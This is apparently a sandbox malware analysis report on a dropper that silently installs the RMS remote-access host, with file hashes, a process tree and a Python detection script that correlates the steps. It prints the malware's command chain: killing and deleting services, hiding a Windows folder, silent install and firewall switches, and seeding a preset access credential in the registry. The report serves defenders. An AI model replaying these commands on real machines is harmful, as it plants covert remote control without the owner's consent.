Analysis
max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-11-2022 04:45

Static task: static1
Behavioral task: behavioral1
Sample: cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Resource: win7-20220812-en
General
Target: cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Size: 3.3MB
MD5: 3034a42900fbface754e83567cb1e8b8
SHA1: 6538da3b999db0894615130fd300a4f2c225c108
SHA256: cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
SHA512: 28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
SSDEEP: 98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH
Malware Config
Signatures
-
Executes dropped EXE 9 IoCs
Processes (pid, image):
- 652 7z.exe
- 800 ses.exe
- 5036 rutserv.exe
- 1656 rutserv.exe
- 4220 rutserv.exe
- 512 rutserv.exe
- 3552 rfusclient.exe
- 4064 rfusclient.exe
- 1684 rfusclient.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), a common geofencing check. Note that this key is also read by ordinary processes when they initialise locale data (cmd.exe is one of the three hits here), so on its own it is weak evidence.
Processes (process: key value queried):
- cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
- cmd.exe: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
- ses.exe: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
Loads dropped DLL 1 IoCs
Processes (pid, image):
- 652 7z.exe (loads the 7z.dll dropped beside it in 7BEB.tmp; see Downloads)
Drops file in System32 directory 3 IoCs
Processes (description, ioc, process):
- File opened for modification: C:\Windows\SysWOW64\rutserv.pdb (rutserv.exe)
- File opened for modification: C:\Windows\SysWOW64\exe\rutserv.pdb (rutserv.exe)
- File opened for modification: C:\Windows\SysWOW64\symbols\exe\rutserv.pdb (rutserv.exe)
Caveat: these three paths (the directory itself, then exe\, then symbols\exe\) follow the order in which the Windows symbol handler searches for a module's PDB, so this is most likely rutserv.exe looking up its own debug symbols with SysWOW64 as its working directory, not a payload being written into System32. The report records no other file activity under System32.
Drops file in Windows directory 31 IoCs
Processes (description, ioc, process): all 31 files were created by cmd.exe (the 15971.bat interpreter) under C:\Windows\spom, the folder that attrib.exe later hides:
- File created: C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp (cmd.exe)
- File created: C:\Windows\spom\dd_vcredistMSI4F4B.txt (cmd.exe)
- File created: C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html (cmd.exe)
- File created: C:\Windows\spom\ses.exe (cmd.exe)
- File created: C:\Windows\spom\jawshtml.html (cmd.exe)
- File created: C:\Windows\spom\wctC61E.tmp (cmd.exe)
- File created: C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt (cmd.exe)
- File created: C:\Windows\spom\dd_vcredistUI4F4B.txt (cmd.exe)
- File created: C:\Windows\spom\GBQHURCC-20220812-1921.log (cmd.exe)
- File created: C:\Windows\spom\wct4E2A.tmp (cmd.exe)
- File created: C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp (cmd.exe)
- File created: C:\Windows\spom\aria-debug-4640.log (cmd.exe)
- File created: C:\Windows\spom\dd_vcredistUI4F1D.txt (cmd.exe)
- File created: C:\Windows\spom\GBQHURCC-20220812-1921a.log (cmd.exe)
- File created: C:\Windows\spom\rfusclient.exe (cmd.exe)
- File created: C:\Windows\spom\wct1510.tmp (cmd.exe)
- File created: C:\Windows\spom\wct8E36.tmp (cmd.exe)
- File created: C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp (cmd.exe)
- File created: C:\Windows\spom\jusched.log (cmd.exe)
- File created: C:\Windows\spom\wmsetup.log (cmd.exe)
- File created: C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp (cmd.exe)
- File created: C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp (cmd.exe)
- File created: C:\Windows\spom\AdobeSFX.log (cmd.exe)
- File created: C:\Windows\spom\chrome_installer.log (cmd.exe)
- File created: C:\Windows\spom\rutserv.exe (cmd.exe)
- File created: C:\Windows\spom\wct399A.tmp (cmd.exe)
- File created: C:\Windows\spom\BroadcastMsg_1660332030.txt (cmd.exe)
- File created: C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe (cmd.exe)
- File created: C:\Windows\spom\msedge_installer.log (cmd.exe)
- File created: C:\Windows\spom\dd_vcredistMSI4F1D.txt (cmd.exe)
- File created: C:\Windows\spom\JavaDeployReg.log (cmd.exe)
Reading this list: besides the RMS binaries (rutserv.exe, rfusclient.exe), the launcher ses.exe and the sample itself, the folder receives installer logs and wct*.tmp files that belong to the sandbox image's own %TEMP%. That mix is what a wholesale copy of the user's Temp folder into C:\Windows\spom would produce. The batch file is not reproduced in the report, so treat this as an inference; the hunting value is the hidden C:\Windows\spom folder itself.
Launches sc.exe 2 IoCs
sc.exe is the Windows utility for controlling services; here it is used to delete two services (see the process tree).
Processes (pid, image):
- 3624 sc.exe
- 1048 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature adds "likely ransomware behaviour", but nothing else in this report supports that reading: there is no mass file modification and no ransom note, and a remote-administration host such as RMS, which exposes the file system to the operator, enumerates drives as a matter of course.
Kills process with taskkill 2 IoCs
Processes (pid, image):
- 4264 taskkill.exe
- 952 taskkill.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (pid, image, number of times recorded):
- 5036 rutserv.exe (6)
- 1656 rutserv.exe (2)
- 4220 rutserv.exe (2)
- 512 rutserv.exe (6)
- 3552 rfusclient.exe (2)
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes (pid, image):
- 1684 rfusclient.exe (the user-session client; registering as a clipboard viewer is consistent with clipboard synchronisation in a remote-control tool)
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes (token privilege, pid, image):
- SeDebugPrivilege: 4264 taskkill.exe
- SeDebugPrivilege: 952 taskkill.exe
- SeDebugPrivilege: 5036 rutserv.exe
- SeDebugPrivilege: 4220 rutserv.exe
- SeTakeOwnershipPrivilege: 512 rutserv.exe
- SeTcbPrivilege: 512 rutserv.exe
- SeTcbPrivilege: 512 rutserv.exe
SeTcbPrivilege is normally only available to SYSTEM, so PID 512 is consistent with the rutserv.exe instance started as a service (the parentless rutserv.exe at the bottom of the process tree), while 5036 and 4220 are the command-line instances spawned by cmd.exe.
Suspicious use of WriteProcessMemory 64 IoCs
Parent -> child pairs (pid image). Each pair was recorded three times; the list stops at 64 entries, so the last pair appears only once:
- 4656 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe -> 4116 cmd.exe
- 4116 cmd.exe -> 652 7z.exe
- 4116 cmd.exe -> 800 ses.exe
- 800 ses.exe -> 5116 cmd.exe
- 5116 cmd.exe -> 4264 taskkill.exe
- 5116 cmd.exe -> 952 taskkill.exe
- 5116 cmd.exe -> 4988 net.exe
- 4988 net.exe -> 5092 net1.exe
- 5116 cmd.exe -> 3764 net.exe
- 3764 net.exe -> 4092 net1.exe
- 5116 cmd.exe -> 3624 sc.exe
- 5116 cmd.exe -> 1048 sc.exe
- 5116 cmd.exe -> 4840 reg.exe
- 5116 cmd.exe -> 3704 attrib.exe
- 5116 cmd.exe -> 5036 rutserv.exe
- 5116 cmd.exe -> 1656 rutserv.exe
- 5116 cmd.exe -> 3684 reg.exe
- 5116 cmd.exe -> 4824 reg.exe
- 5116 cmd.exe -> 4996 reg.exe
- 5116 cmd.exe -> 4748 reg.exe
- 5116 cmd.exe -> 3364 reg.exe
- 5116 cmd.exe -> 3048 reg.exe (recorded once; list truncated here)
Views/modifies file attributes 1 TTPs 1 IoCs
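Taken together, the signatures above describe one deployment chain rather than unrelated events: a batch script kills any running rutserv.exe/rfusclient.exe, stops and deletes two services, removes the "Remote Manipulator System" registry key, hides its staging folder under C:\Windows, then runs rutserv.exe /silentinstall, /firewall and /start and seeds the Parameters key. The following is an added example, not part of the sandbox report and not RMS code: a small Python rule set that runs over process-creation records and raises an alert when several distinct steps of that chain share one parent process. The record layout (parent PID, image path, command line) is an assumption shaped like Sysmon Event ID 1 / Security 4688 fields; the sample records are the command lines from this report's process tree, all children of cmd.exe PID 5116, plus one constructed benign control line.

```python
"""Detection logic for the RMS silent-deployment chain recorded in this report.

Added example; not part of the sandbox report and not RMS code. A few rules
are run over process-creation records and hits are correlated per parent
process. The record layout (parent PID, image path, command line) is an
assumption shaped like Sysmon Event ID 1 / Security 4688 fields.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

RMS_SERVICES = {"netaservice", "rmanservice"}
RMS_IMAGES = {"rutserv.exe", "rfusclient.exe"}
RMS_HOST_SWITCHES = {"/silentinstall", "/firewall", "/start"}
RMS_REG_KEY = r"\remote manipulator system"  # under HKLM\SYSTEM


@dataclass(frozen=True)
class ProcEvent:
    ppid: int
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _tokens(cmdline: str) -> Set[str]:
    # Whitespace split with surrounding quotes stripped; adequate for these command lines.
    return {t.strip('"').lower() for t in cmdline.split()}


def from_user_writable_path(image: str) -> bool:
    """True when the binary runs from a user profile or temp folder instead of Program Files."""
    low = image.lower()
    return "\\users\\" in low or "\\temp\\" in low


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the deployment step this event matches, or None."""
    img = _basename(ev.image)
    toks = _tokens(ev.cmdline)
    low = ev.cmdline.lower()
    if img == "rutserv.exe" and toks & RMS_HOST_SWITCHES:
        return "rms_host_cli"  # rutserv.exe /silentinstall, /firewall, /start
    if img == "taskkill.exe" and toks & RMS_IMAGES:
        return "rms_service_teardown"  # kill a previous host before reinstalling
    if img == "net.exe" and "stop" in toks and toks & RMS_SERVICES:
        return "rms_service_teardown"
    if img == "sc.exe" and "delete" in toks and toks & RMS_SERVICES:
        return "rms_service_teardown"
    if img == "reg.exe" and RMS_REG_KEY in low:
        return "rms_registry"  # reg delete of the key, or REG ADD of Parameters values
    if img == "attrib.exe" and {"+h", "+s"} <= toks and "c:\\windows\\" in low:
        return "hidden_windows_dir"  # staging folder hidden as a system directory
    return None


def scan(events: List[ProcEvent], min_distinct_rules: int = 3) -> Tuple[List[Dict[str, str]], List[int]]:
    """Return per-event hits and the parent PIDs whose children cover enough distinct steps."""
    hits: List[Dict[str, str]] = []
    rules_by_parent: Dict[int, Set[str]] = defaultdict(set)
    for ev in events:
        rule = classify(ev)
        if rule is None:
            continue
        note = ""
        if rule == "rms_host_cli" and from_user_writable_path(ev.image):
            note = "RMS host launched from a user-writable path"
        hits.append({"rule": rule, "ppid": str(ev.ppid), "cmdline": ev.cmdline, "note": note})
        rules_by_parent[ev.ppid].add(rule)
    alerts = [ppid for ppid, rules in rules_by_parent.items() if len(rules) >= min_distinct_rules]
    return hits, alerts


# Command lines copied from the report's process tree; all are children of cmd.exe
# PID 5116 (the 15971.bat interpreter). The final record is a constructed benign
# control and must not match.
REPORT_EVENTS = [
    ProcEvent(5116, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im rfusclient.exe"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im rutserv.exe"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\net.exe", "net stop netaservice"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\net.exe", "net stop rmanservice"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\sc.exe", "sc delete netaservice"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\sc.exe", "sc delete rmanservice"),
    ProcEvent(5116, r"C:\Windows\SysWOW64\reg.exe", r'reg delete "HKLM\SYSTEM\Remote Manipulator System" /f'),
    ProcEvent(5116, r"C:\Windows\SysWOW64\attrib.exe", r'attrib +s +h "C:\Windows\spom"'),
    ProcEvent(5116, r"C:\Users\Admin\AppData\Local\Temp\rutserv.exe", '"rutserv.exe" /silentinstall'),
    ProcEvent(5116, r"C:\Users\Admin\AppData\Local\Temp\rutserv.exe", '"rutserv.exe" /firewall'),
    ProcEvent(5116, r"C:\Windows\SysWOW64\reg.exe",
              r'REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"'),
    ProcEvent(5116, r"C:\Users\Admin\AppData\Local\Temp\rutserv.exe", '"rutserv.exe" /start'),
    ProcEvent(1234, r"C:\Windows\System32\net.exe", "net stop spooler"),  # constructed control
]

if __name__ == "__main__":
    found, alerted = scan(REPORT_EVENTS)
    for h in found:
        print(f"{h['rule']:<22} ppid={h['ppid']} {h['cmdline'][:70]}")
    print("alert parents:", alerted)
```

The correlation step is what keeps this usable: each rule on its own fires on legitimate RMS administration (the vendor's own installer runs the same switches), but one parent process that tears down the service, rewrites the registry key, hides a folder under C:\Windows and launches rutserv.exe from a user's Temp directory within one script is the pattern this report shows. Swap `REPORT_EVENTS` for records from your own telemetry, keeping the three fields.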
Processes

[1] C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.bat" "
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe
        Command line: 7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
        7-Zip extracts Sys.7z (archive password: system32.dll) into the user's Temp folder; rutserv.exe, rfusclient.exe and ses.exe are the files that appear there next (see Downloads).
        - Executes dropped EXE
        - Loads dropped DLL
    [3] C:\Users\Admin\AppData\Local\Temp\ses.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.bat" -p "
          ses.exe unpacks and runs 15971.bat from a temporary folder, the same way the sample ran new.bat. This cmd.exe is PID 5116 in the WriteProcessMemory list and is the parent of every step below.
          - Drops file in Windows directory
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /f /im rfusclient.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /f /im rutserv.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\net.exe
            Command line: net stop netaservice
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\net1.exe
              Command line: C:\Windows\system32\net1 stop netaservice
        [5] C:\Windows\SysWOW64\net.exe
            Command line: net stop rmanservice
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\net1.exe
              Command line: C:\Windows\system32\net1 stop rmanservice
        [5] C:\Windows\SysWOW64\sc.exe
            Command line: sc delete netaservice
            - Launches sc.exe
        [5] C:\Windows\SysWOW64\sc.exe
            Command line: sc delete rmanservice
            - Launches sc.exe
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
            Removes any existing RMS configuration so the values written below take effect cleanly.
        [5] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib +s +h "C:\Windows\spom"
            - Sets file to hidden
            - Views/modifies file attributes
        [5] C:\Users\Admin\AppData\Local\Temp\rutserv.exe
            Command line: "rutserv.exe" /silentinstall
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\rutserv.exe
            Command line: "rutserv.exe" /firewall
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d [REG_BINARY value not reproduced in this copy of the report]
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
            (no data value is shown for this entry)
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
            The data is UTF-16LE text: a 128-character hexadecimal string (64 bytes), i.e. a pre-set hashed or derived access credential rather than a plaintext password; the report does not identify the algorithm.
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d [REG_BINARY value not reproduced in this copy of the report]
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d [REG_BINARY value not reproduced in this copy of the report]
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
            Note that this points at the product's default install directory even though the copies that actually ran came from the user's Temp folder; check both locations on a live host.
        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e00310030003000300 03c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
            The data is a UTF-16LE XML document (BOM ff fe) for the host's screen-recording schedule; it decodes to <sreen_record_option version="56006"> with <active>false</active>, so recording is left switched off.
        [5] C:\Users\Admin\AppData\Local\Temp\rutserv.exe
            Command line: "rutserv.exe" /start
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\rutserv.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
    No parent is shown; this is consistent with the service instance started by the Service Control Manager after /start, and it is the instance that spawns the user-session client below.
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
        - Executes dropped EXE
        - Suspicious behavior: SetClipboardViewer
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.dll
  Filesize: 893KB
  MD5: 04ad4b80880b32c94be8d0886482c774
  SHA1: 344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
  SHA256: a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
  SHA512: 3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
- C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe
  Filesize: 160KB
  MD5: a51d90f2f9394f5ea0a3acae3bd2b219
  SHA1: 20fea1314dbed552d5fedee096e2050369172ee1
  SHA256: ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
  SHA512: c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
- C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\Sys.7z
  Filesize: 2.2MB
  MD5: be88b8b3ce26e220162b65029b3f0b38
  SHA1: 468389733444173e91f2ac208d500deed637a241
  SHA256: 502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5
  SHA512: 36f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb
- C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.bat
  Filesize: 65B
  MD5: 13310849fd8d70c608fd7b02fa86eea5
  SHA1: 9e79bc5cc474fefbe6ec40f8403ba74bb271f393
  SHA256: 03d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42
  SHA512: 909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30
- C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.bat
  Filesize: 10KB
  MD5: 64736420a3b8c3061f89d2bdac26465c
  SHA1: 306f8e23b6c979e863cca7f238dd229543e40b35
  SHA256: ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119
  SHA512: 9983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  Filesize: 4.8MB
  MD5: 71abd0cadb18ddcb92a4dc990a29824b
  SHA1: d640ecac5ef9db4a642357a5b187c778798a9459
  SHA256: e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
  SHA512: 51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
- C:\Users\Admin\AppData\Local\Temp\rutserv.exe
  Filesize: 5.8MB
  MD5: 9a9cad56988e3c52f154187752ef453e
  SHA1: 0f9cf3a9cf3d030694179437df7502937cc15cff
  SHA256: e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
  SHA512: 2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
- C:\Users\Admin\AppData\Local\Temp\ses.exe
  Filesize: 46KB
  MD5: 771c4d6a2b4419d6598ec589a54212f5
  SHA1: 445f2be41589b527f643b09bf6a86ba88fd00b95
  SHA256: 942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
  SHA512: f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8
Memory dumps (one mapping dump per process created during the run)
- memory/652-134-0x0000000000000000-mapping.dmp
- memory/800-141-0x0000000000000000-mapping.dmp
- memory/952-146-0x0000000000000000-mapping.dmp
- memory/1048-152-0x0000000000000000-mapping.dmp
- memory/1656-159-0x0000000000000000-mapping.dmp
- memory/1684-175-0x0000000000000000-mapping.dmp
- memory/3048-166-0x0000000000000000-mapping.dmp
- memory/3364-165-0x0000000000000000-mapping.dmp
- memory/3552-171-0x0000000000000000-mapping.dmp
- memory/3624-151-0x0000000000000000-mapping.dmp
- memory/3684-161-0x0000000000000000-mapping.dmp
- memory/3704-154-0x0000000000000000-mapping.dmp
- memory/3764-149-0x0000000000000000-mapping.dmp
- memory/4064-172-0x0000000000000000-mapping.dmp
- memory/4092-150-0x0000000000000000-mapping.dmp
- memory/4116-132-0x0000000000000000-mapping.dmp
- memory/4220-168-0x0000000000000000-mapping.dmp
- memory/4264-145-0x0000000000000000-mapping.dmp
- memory/4424-167-0x0000000000000000-mapping.dmp
- memory/4748-164-0x0000000000000000-mapping.dmp
- memory/4824-162-0x0000000000000000-mapping.dmp
- memory/4840-153-0x0000000000000000-mapping.dmp
- memory/4988-147-0x0000000000000000-mapping.dmp
- memory/4996-163-0x0000000000000000-mapping.dmp
- memory/5036-157-0x0000000000000000-mapping.dmp
- memory/5092-148-0x0000000000000000-mapping.dmp
- memory/5116-143-0x0000000000000000-mapping.dmp